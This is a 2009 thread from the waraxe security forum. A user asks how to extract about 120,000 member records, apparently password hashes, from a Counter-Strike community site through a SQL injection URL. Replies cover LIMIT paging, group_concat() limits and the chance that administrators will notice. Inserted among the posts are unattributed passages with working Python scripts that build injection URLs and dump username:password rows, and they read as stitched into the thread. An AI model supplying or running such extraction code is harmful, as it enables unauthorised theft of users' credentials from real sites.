Waraxe IT Security Portal  
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> SQLi dump problem
SQLi dump problem
Posted: Mon Jan 12, 2009 3:13 pm
10_Sec_Hero
Advanced user
Joined: Oct 22, 2008
Posts: 52
OK, so here is a URL example:
Code:
http://www.host.com/script.php?id=2572 AND 1=0 UNION SELECT ALL 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from table_name--

version: 5.0.51a-community

let's say column 2 is vulnerable and I want to dump all the data in it (about 120,000 rows), and I want it all at once. What function should I use? I tried group_concat(), which dumps only about 15 rows, and concat(), which dumps just 1 row. Usually concat() works fine for dumping all the data.

Thanks :)

_________________
Sky Is The Limit !!
Posted: Mon Jan 12, 2009 3:28 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
You can issue multiple requests with LIMIT x,y.
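For illustration, the multiple-request approach could be scripted roughly like this. The host, script name, 24-column layout, and the table/column names (`table_name`, `username`, `password`) are all hypothetical, taken from the example URL above; group_concat() is wrapped around a derived table so that LIMIT applies to the rows being concatenated rather than to the single aggregated result row.

```python
# Sketch: build one injection URL per chunk, paging through the table
# with LIMIT offset,count inside a derived table. Everything named here
# is an assumption based on the example URL earlier in the thread.
BASE = "http://www.host.com/script.php?id=2572"
COLS = 24      # columns in the original UNION SELECT
VULN_COL = 2   # column whose value is reflected in the page
CHUNK = 40     # rows per request; keeps output under group_concat's ~1024-byte cap

def make_url(offset, count=CHUNK):
    # Subquery so LIMIT selects which rows get concatenated.
    sub = ("(SELECT group_concat(username,0x3a,password) FROM "
           "(SELECT username,password FROM table_name LIMIT %d,%d) t)"
           % (offset, count))
    cols = ",".join(sub if i == VULN_COL else str(i)
                    for i in range(1, COLS + 1))
    return (BASE + " AND 1=0 UNION SELECT ALL " + cols + "--").replace(" ", "%20")

urls = [make_url(off) for off in range(0, 120000, CHUNK)]
```

At 40 rows per request, 120,000 rows comes to 3,000 requests instead of 120,000, though each URL would still have to be fetched and scraped one at a time.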
Posted: Mon Jan 12, 2009 3:43 pm
10_Sec_Hero
Advanced user
Joined: Oct 22, 2008
Posts: 52
Using LIMIT I only get 1 row each time, and I want all 120,000 rows in one go or a couple of goes, certainly not 120,000 requests :lol:

_________________
Sky Is The Limit !!
Posted: Mon Jan 12, 2009 4:25 pm
Chb
Valuable expert
Joined: Jul 23, 2005
Posts: 206
Location: Germany
What about a little script that fetches and saves the 120,000 rows? :)

_________________
www.der-chb.de
Posted: Mon Jan 12, 2009 4:39 pm
10_Sec_Hero
Advanced user
Joined: Oct 22, 2008
Posts: 52
I have no experience with scripts, no idea how to create or run them; I only do URL-based injection :roll:

_________________
Sky Is The Limit !!
Posted: Mon Jan 12, 2009 9:31 pm
tehhunter
Valuable expert
Joined: Nov 19, 2008
Posts: 261
Chb wrote:
What about a little script that fetches and saves the 120,000 rows? :)

That's what he might have to do, but it's not necessarily the best idea. Administrators might notice 120,000 page views of a slightly modified injection URL. Is this a big site? Seeing as you are trying to extract 120,000 hashes (I guess?), it probably is.

Before that solution, though, try what waraxe said: use group_concat() along with LIMIT 0,120000 and see if that helps. Perhaps the problem is that group_concat() has a default maximum output size, and that's why it stops at about 15 rows?
Posted: Tue Jan 13, 2009 5:26 am
10_Sec_Hero
Advanced user
Joined: Oct 22, 2008
Posts: 52
tehhunter wrote:
Chb wrote:
What about a little script that fetches and saves the 120,000 rows? :)

That's what he might have to do, but it's not necessarily the best idea. Administrators might notice 120,000 page views of a slightly modified injection URL. Is this a big site? Seeing as you are trying to extract 120,000 hashes (I guess?), it probably is.

Before that solution, though, try what waraxe said: use group_concat() along with LIMIT 0,120000 and see if that helps. Perhaps the problem is that group_concat() has a default maximum output size, and that's why it stops at about 15 rows?

It's a Counter-Strike site with a forum of 120,000 members. group_concat() along with LIMIT 0,120000 doesn't work; I tried it before making this topic. group_concat() always caps out at roughly 1000 characters, which in this case is 46 rows.

_________________
Sky Is The Limit !!
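For what it's worth, the roughly-1000-character ceiling described above matches MySQL's group_concat_max_len system variable, which defaults to 1024 bytes; anything beyond that is silently truncated. A quick sanity check of the 46-row figure, assuming an average of about 22 characters per concatenated entry (separator included, which is an assumption inferred from the numbers in the post):

```python
# group_concat() output is truncated to group_concat_max_len bytes,
# which defaults to 1024 in MySQL. At ~22 characters per entry,
# roughly 46 rows fit before truncation.
GROUP_CONCAT_MAX_LEN = 1024   # MySQL default
chars_per_row = 22            # assumed average entry length
print(GROUP_CONCAT_MAX_LEN // chars_per_row)  # -> 46
```

On a server you administer the cap can be raised with `SET SESSION group_concat_max_len`, but that is not normally reachable through a single injected SELECT.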
Posted: Tue Jan 13, 2009 8:57 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
So it appears that you can use group_concat(), but the problem is elsewhere: the column you are using for the data fetch is probably declared as varchar(1024) or varchar(1000). If you can use another column with a TEXT data type, those limits are gone. Otherwise your only choice is to write a script and fetch the data via multiple requests with the help of LIMIT.
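A minimal fetch-and-save loop along the lines suggested above might look like this. The URL template, the 0x3a3a (`::`) markers used to locate the value in the returned HTML, and the table/column names are all assumptions for illustration, not the actual target:

```python
import re
import urllib.request

# Hypothetical injection template: LIMIT {off},1 pages through the table
# one row per request, and 0x3a3a ("::") brackets the interesting value
# so it is easy to scrape out of the response HTML.
TEMPLATE = ("http://www.host.com/script.php?id=2572%20AND%201=0%20UNION%20"
            "SELECT%20ALL%201,concat(0x3a3a,username,0x3a,password,0x3a3a),"
            "3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20"
            "from%20table_name%20LIMIT%20{off},1--")

MARKER = re.compile(r"::(.+?)::")

def extract(html):
    """Pull the marker-delimited value out of one response page."""
    m = MARKER.search(html)
    return m.group(1) if m else None

def dump(total_rows, out_path):
    """Fetch every row via repeated requests and save them to a file."""
    with open(out_path, "w") as out:
        for off in range(total_rows):
            page = urllib.request.urlopen(TEMPLATE.format(off=off))
            row = extract(page.read().decode("utf-8", "replace"))
            if row:
                out.write(row + "\n")
```

One row per request is slow (120,000 requests for the table discussed here); combining this loop with a group_concat() chunk per request cuts the count down considerably, though as tehhunter notes, that much traffic is still easy for an administrator to spot in the logs.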
Powered by phpBB © 2001-2008 phpBB Group
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"